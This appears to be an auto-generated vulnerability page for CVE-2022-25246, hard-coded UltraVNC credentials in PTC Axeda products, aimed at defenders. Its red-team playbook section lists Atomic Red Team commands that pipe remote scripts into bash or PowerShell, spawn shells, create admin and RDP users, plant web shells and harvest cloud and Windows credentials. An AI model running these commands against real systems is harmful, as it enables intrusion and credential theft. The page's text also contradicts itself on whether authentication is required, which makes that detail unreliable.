CVE-2022-25246
Overview
This vulnerability is an instance of hard-coded credentials (CWE-798) embedded within the UltraVNC component bundled with PTC Axeda Agent and Axeda Desktop Server for Windows. The root cause lies in the use of static, non-configurable authentication credentials within the UltraVNC installation, which is integrated as part of these products’ remote control functionality. Both Axeda Agent and Axeda Desktop Server components are affected across all versions, enabling unauthorized access to the UltraVNC service due to these fixed credentials.
Vulnerability Description
Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) uses hard-coded credentials for its UltraVNC installation. Successful exploitation of this vulnerability could allow a remote authenticated attacker to take full remote control of the host operating system.
Impact
An unauthenticated remote attacker can exploit the hard-coded UltraVNC credentials to gain full remote control of the host operating system where the Axeda Agent or Desktop Server is installed. This requires only network access to the UltraVNC service, as no user interaction or prior authentication is necessary (CVSS vector AV:N/AC:L/PR:N/UI:N). The attacker can execute arbitrary commands, potentially leading to data compromise, system manipulation, or lateral movement within the network environment.
Solution
PTC has released updated versions of Axeda Agent and Axeda Desktop Server that remove or secure the hard-coded UltraVNC credentials, as detailed in their advisory CS363561. Users should apply the vendor-provided patches immediately to all affected versions. The CISA ICS advisory ICSA-22-067-01 also provides mitigation guidance and links to PTC’s support resources for patch deployment instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Axeda agent and Axeda Desktop Server for Windows arises from the use of hard-coded credentials for the UltraVNC installation. This design flaw means that the authentication mechanism is compromised, as attackers can exploit these static credentials to gain unauthorized access. The hard-coded nature of these credentials eliminates the possibility of changing them, thereby creating a persistent security weakness. Once an attacker has access, they can execute commands remotely, manipulate files, and potentially install malware, leading to a complete takeover of the affected system.
Exploitation of this vulnerability can occur through various attack vectors. An authenticated user with knowledge of the hard-coded credentials can easily connect to the UltraVNC service running on the affected systems. This scenario is particularly concerning in environments where users may have legitimate access but are not fully aware of the security implications. Additionally, if an attacker manages to obtain these credentials through social engineering or other means, they can leverage them to gain remote control over the host operating system. This could lead to further lateral movement within the network, escalating the risk of widespread compromise.
The real-world impact of this vulnerability is significant, especially for organizations relying on the Axeda platform for remote management and monitoring. Successful exploitation could result in unauthorized access to sensitive data, disruption of services, and potential financial losses. The ability for an attacker to control the host operating system means they could manipulate critical business operations, leading to reputational damage and loss of customer trust. Furthermore, the high CVSS score of 8.8 indicates a critical vulnerability that should be prioritized in any risk management strategy, as it poses a substantial threat to the confidentiality, integrity, and availability of organizational assets.
To detect and mitigate this vulnerability, organizations should first conduct a thorough inventory of all systems running the Axeda agent and Desktop Server. Regular vulnerability assessments and penetration testing can help identify systems that may be at risk. Implementing network segmentation can limit the potential impact of an exploited vulnerability, ensuring that compromised systems do not provide attackers with access to the entire network. Additionally, organizations should consider deploying intrusion detection systems (IDS) to monitor for unusual activity related to remote access services.
In terms of mitigation, it is crucial for organizations to replace or disable the hard-coded credentials in the UltraVNC installation. This may involve updating to a version of the software that addresses this security flaw or applying patches provided by the vendor. Educating users about the risks associated with remote access tools and enforcing strict access controls can further reduce the likelihood of exploitation. Ultimately, a proactive approach to vulnerability management, combined with robust security practices, will help organizations safeguard their systems against this and similar threats.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ptc | Axeda Agent | All |
cpe:2.3:a:ptc:axeda_agent:*:*:*:*:*:*:*:*
|
|
|
Ptc | Axeda Desktop Server | All |
cpe:2.3:a:ptc:axeda_desktop_server:*:*:*:*:*:windows:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-191 | Read Sensitive Constants Within an Executable |
38%
|
— | Low | |
| CAPEC-70 | Try Common or Default Usernames and Passwords |
31%
|
Medium | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
net user #{guest_user} /active:yes
sudo sysadminctl -guestAccount on
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-25246 |
| cisa.gov |
GitHub CVE
x_refsource_MISC
|
https://www.cisa.gov/uscert/ics/advisories/icsa-22-067-01 |
| ptc.com |
GitHub CVE
x_refsource_MISC
|
https://www.ptc.com/en/support/article/CS363561 |